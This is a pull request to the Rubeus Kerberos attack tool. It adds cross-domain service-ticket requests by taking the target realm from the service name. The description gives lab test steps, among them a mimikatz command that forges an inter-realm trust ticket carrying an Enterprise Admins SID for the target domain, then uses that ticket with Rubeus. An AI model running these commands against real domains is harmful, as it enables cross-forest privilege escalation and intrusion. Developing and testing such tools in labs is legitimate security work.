### PR TITLE
included support for cross domain ask tgs by getting target domain fr…

### DIFF
--- a/Rubeus/lib/Ask.cs
+++ b/Rubeus/lib/Ask.cs
@@ -330,7 +330,7 @@ namespace Rubeus
                 info.key.keyvalue = encRepPart.key.keyvalue;
 
                 // [1] prealm (domain)
-                info.prealm = encRepPart.realm;
+                info.prealm = rep.crealm;
 
                 // [2] pname (user)
                 info.pname.name_type = rep.cname.name_type;

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -23,6 +23,18 @@ namespace Rubeus
         {
             TGS_REQ req = new TGS_REQ();
 
+            // get domain from service for cross domain requests
+            string targetDomain = "";
+            string[] parts = sname.Split('/');
+            if (parts.Length > 1)
+            {
+                targetDomain = parts[1].Substring(parts[1].IndexOf('.')+1);
+            }
+            else
+            {
+                targetDomain = domain;
+            }
+
             // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
             PA_DATA padata = new PA_DATA(domain, userName, providedTicket, clientKey, paEType);
             req.padata.Add(padata);
@@ -31,7 +43,7 @@ namespace Rubeus
             req.req_body.cname.name_string.Add(userName);
 
             // the realm (domain) the user exists in
-            req.req_body.realm = domain;
+            req.req_body.realm = targetDomain;
 
             // add in our encryption types
             if (requestEType == Interop.KERB_ETYPE.subkey_keymaterial)
@@ -63,7 +75,6 @@ namespace Rubeus
 
             else
             {
-                string[] parts = sname.Split('/');
                 if (parts.Length == 1)
                 {
                     // KRB_NT_SRV_INST = 2

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -24,9 +24,10 @@ namespace Rubeus
             TGS_REQ req = new TGS_REQ();
 
             // get domain from service for cross domain requests
+            // if not requesting a cross domain TGT (krbtgt)
             string targetDomain = "";
             string[] parts = sname.Split('/');
-            if (parts.Length > 1)
+            if ((parts.Length > 1) && (parts[0] != "krbtgt"))
             {
                 targetDomain = parts[1].Substring(parts[1].IndexOf('.')+1);
             }


### PR DESCRIPTION
…om the sname argument to NewTGSReq

As discussed on Slack requesting a service ticket using a cross domain TGT didn't work. By extracting the target domain from the sname argument, this should support intra-domain and cross-domain requests. No extra arguments are required as the sname is specified with the /service switch and if it contains a '/', it extracts everything after the first '.' from the second element when splitting by '/' (which should always be the target domain of the service).

Everything works fine in my labs. Way to test:

1. Generate a cross domain TGT (I did this with mimikatz):
```
mimikatz # kerberos::golden /rc4:[trust key] /sid:[local domain sid] /user:[user] /id:1000 /groups:510 /sids:[target domain sid]-519 /domain:[local domain] /service:krbtgt /target:[target domain] /ticket:C:\temp\golden-trust.kirbi
```

2. Use this ticket with asktgs:
```
.\Rubeus.exe asktgs /ticket:C:\temp\golden-trust.kirbi /dc:[target domain controller] /service:[svc]/[target host]
```

The target domain controller is required (in my lab at least, but I was trying from a non domain joined machine), otherwise fails with:

```
[X] Error 1355 retrieving domain controller : The specified domain either does not exist or could not be contacted
[X] Error: No domain controller could be located
```